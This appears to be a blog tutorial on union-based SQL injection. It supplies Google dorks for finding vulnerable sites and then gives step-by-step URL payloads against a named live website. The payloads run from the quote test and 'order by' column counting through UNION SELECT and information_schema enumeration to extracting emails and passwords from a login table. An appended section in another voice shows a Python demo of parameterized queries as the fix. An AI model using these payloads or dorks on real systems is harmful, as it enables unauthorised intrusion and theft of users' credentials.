
SQL injection example

Hello folks, in the last article we saw how to use sqlmap for automated SQL injection. If you didn't see it, click on the link and go through it. Today's article is a SQL injection example.

In today's article, I am going to explain union-based SQL injection by going through an example. Let's start.

Step 1:

First, find a website vulnerable to SQL injection. We can use Google dorks to find such websites; I am providing some dorks you can use.

  • GOOGLE Dorks for SQL injection:

    • home.php?cat=
    • view_items.php?id=
    • product.php?sku=
    • main.php?id=

Find vulnerable websites using the above dorks (if you don't know how to use dorks, comment below and I will definitely make an article on Google dorks).

Step 2:

I found one vulnerable website; I assume that you also found one.

First, check whether the website is vulnerable to SQL injection by inserting a single quote ( ' ) at the end of the URL:

  • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’

If you get any kind of SQL error, then it's vulnerable to SQL injection.

Hell yeah, we got a SQL injection vulnerable website.

  • Example:

[Screenshot: sql injection]

If you get an error similar to the above example, then it's vulnerable to SQL injection. Now let's start exploitation.

Step 3:

Now put " -- - " at the end of the URL to balance the error. This comments out the rest of the original query, and now you can see the error is gone.

  • Example:
    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ — –

Step 4:

Let's move towards exploitation. First we have to find the number of columns.

To find the number of columns we have to use " order by ".

Consider the example below to see how to use it: start at 1 and increase the value in the URL until it returns an error.

  • Example:
    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ order by 1 — –
    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ order by 2 — –
    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ order by 3 — –
    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ order by 22 — –

[Screenshot: sqli column error]

We get an error on the number 22 as shown above, so the number of columns is 21.

Step 5:

So now let's find which column is vulnerable so we can use it for injection.

For that, we have to use " union select ", as in the example shown below.

Remove order by from the URL and put union select, then add the numbers 1-21 (one for each column present) and press enter. You will see all the vulnerable column numbers on the page.

Example:

  • input
    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 — –
  • output
    • [Screenshot: vulnerable columns]

So here we got the vulnerable columns, which are numbers 3 and 2. Now let's try to inject through these columns.

Step 6:

Now try to fetch table names from this website's database using these vulnerable columns.

We have vulnerable columns 2 and 3, so replace 2 with table_name and after the last number add " from information_schema.tables ".

Example:

  • input:
    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ UNION SELECT 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.tables  — –
  • output:
    • [Screenshot: sqli tables]

We got the following tables: "contact, login, profession, profiles". Now let's try to fetch column names from the login table.

Step 7:

Now that we have the table names, let's fetch column names from the login table. For that, make the changes in the URL that I am showing below.

Replace table_name with column_name and " from information_schema.tables " with " from information_schema.columns where table_name='login' ".

Example:

  • input:
    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ UNION SELECT 1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.columns where table_name=’login’– –
  • output:
    • [Screenshot: columns sqli]

So here we got the column names id, name, email, pass. Now let's try to fetch user logins from this table.

Step 8:

Now we have table_name and column_names, so let's fetch data from the table.

Replace column_name with concat(email,pass) and " from information_schema.columns where table_name='login' " with " from login ".

Example:

  • input:

    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ UNION SELECT 1,concat(email,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from login– –
  • output:

[Screenshot: final step]

That's all, we got login details from the website's database. If you have any questions, comment below and I will definitely answer. Please share this article with your friends and subscribe to notifications.
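Every step above works only because the page builds its query by pasting the request parameter into the SQL text. As an added example (not code from this article or from the site it discusses), the following Python/sqlite3 code puts that pattern beside a parameterized query and feeds both the same inputs. The table layout, sample rows and function names are constructed assumptions, with three columns instead of 21 and SQLite standing in for the site's database.

```python
import sqlite3

def make_db():
    """Build a constructed in-memory database (sample data, not from the article)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE workers (id INTEGER, name TEXT, profession TEXT);
        CREATE TABLE login (id INTEGER, name TEXT, email TEXT, pass TEXT);
        INSERT INTO workers VALUES (1, 'Sample Worker', 'Driver');
        INSERT INTO login VALUES (1, 'admin', 'admin@example.test', 'constructed-hash');
    """)
    return db

def workers_vulnerable(db, profession):
    # Vulnerable pattern: the request parameter is pasted into the SQL text,
    # so a quote in the input ends the string literal and the rest runs as SQL.
    sql = "SELECT id, name, profession FROM workers WHERE profession = '" + profession + "'"
    return db.execute(sql).fetchall()

def workers_safe(db, profession):
    # Hardened pattern: the SQL text is fixed and the value is bound separately,
    # so the input can only ever be compared as data.
    sql = "SELECT id, name, profession FROM workers WHERE profession = ?"
    return db.execute(sql, (profession,)).fetchall()

def classify(db, query_fn, value):
    """Return 'error' if the query fails, else the rows the page would render."""
    try:
        return query_fn(db, value)
    except sqlite3.Error:
        return "error"

# Constructed inputs mirroring the quote test (Step 2) and the final UNION step.
QUOTE_PROBE = "Driver'"
UNION_INPUT = "Driver' UNION SELECT 1, email || pass, 3 FROM login -- -"

if __name__ == "__main__":
    db = make_db()
    for label, fn in (("vulnerable", workers_vulnerable), ("parameterized", workers_safe)):
        for value in ("Driver", QUOTE_PROBE, UNION_INPUT):
            print(f"{label:13} {value!r:62} -> {classify(db, fn, value)}")
```

With the bound parameter, the quote no longer produces an error and the UNION input matches no profession, so neither the Step 2 test nor the later steps have anything to work with.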

 
